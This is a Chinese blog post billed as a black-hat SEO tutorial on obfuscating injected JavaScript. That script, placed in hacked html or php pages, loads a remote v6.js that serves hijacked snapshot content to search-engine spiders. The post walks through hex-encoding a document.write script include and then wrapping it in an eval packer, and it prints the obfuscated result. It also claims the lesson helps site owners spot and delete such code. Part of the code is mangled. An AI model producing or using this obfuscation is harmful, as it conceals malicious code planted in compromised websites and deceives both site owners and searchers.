黑帽SEO教程为html中的js跳转url加密

　　有一些黑帽SEO要对跳转的js代码进行加密，学习JavaScript加密方式，当我们网站被黑时，看到这段代码就明白这就是快照劫持的代码，删掉即可解决网站被黑问题。今天，错误博客（cuowu.com）分享的内容为《黑帽SEO教程为html中的js跳转url加密》。希望对大家有所帮助。

　　JavaScript跳转是黑帽SEO中快照劫持常见操作手法，比如在寄生虫程序使用中，在被黑掉的html或php中增加如下代码就可以完成快照劫持：

　　[xss_clean][xss_clean]

　　这段JavaScript代码的作用是引入v6.js文件，v6.js文件中的内容为if判断语句，如果访问的是百度蜘蛛、360蜘蛛、搜狗蜘蛛等，则显示劫持的快照内容，如果是用户直接访问浏览器则会显示原页面内容。

　　首先把上面的命令增加为如下：

　　window[“document”][“write”](‘scritptype=”text/javascript”scr=”)[xss_clean];

　　然后，对前面双引号内的内容进行16进制加密，后面单引号内容也同样进行16进制加密，依次为：

　　x64x6fx63x75x6dx65x6ex74

　　x77x72x69x74x65

　　x73x63x72x69x74x70x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x20x73x63x72x3dx22x68x74x74x70x73x3ax2fx2fx63x75x6fx77x75x2ex63x6fx6dx2fx76x36x2ex6ax73

　　这个可以用utf-8转16进制加密在线工具即可。错误博客站长导航里面有。

　　站长导航（

　　加密完成后变为：

　　window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](‘x73x63x72x69x74x70x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x20x73x63x72x3dx22x68x74x74x70x73x3ax2fx2fx63x75x6fx77x75x2ex63x6fx6dx2fx76x36x2ex6ax73’)[xss_clean];

　　然后，把上述的js代码再次补充一下才能正常运行，即：

　　[xss_clean]

　　window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](‘x73x63x72x69x74x70x20x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x20x73x63x72x3dx22x68x74x74x70x73x3ax2fx2fx63x75x6fx77x75x2ex63x6fx6dx2fx76x36x2ex6ax73’)[xss_clean];

　　[xss_clean]

　　把中间window到[xss_clean];的内容利用站长工具的JS混淆加密压缩就可以得到eval加密形式，错误博客站长导航里面有。

　　站长导航（

　　获得如下加密代码如下：

　　eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){returnd[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(newRegExp(‘\b’+e(c)+’\b’,’g’),k[c]);returnp;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2’)

;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

　　最终获得的加密代码如下：

　　[xss_clean]

　　eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){returnd[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(newRegExp(‘\b’+e(c)+’\b’,’g’),k[c]);returnp;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2’)

;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

　　[xss_clean]

　　这就是全部的js加密压缩过程了，解压过程反过来推就可以了。

　　以上就是错误博客（分享的内容为《黑帽SEO为html中的js加密（js混淆与16进制加密）》。感谢您的阅读。更多原创搜索“错误博客”。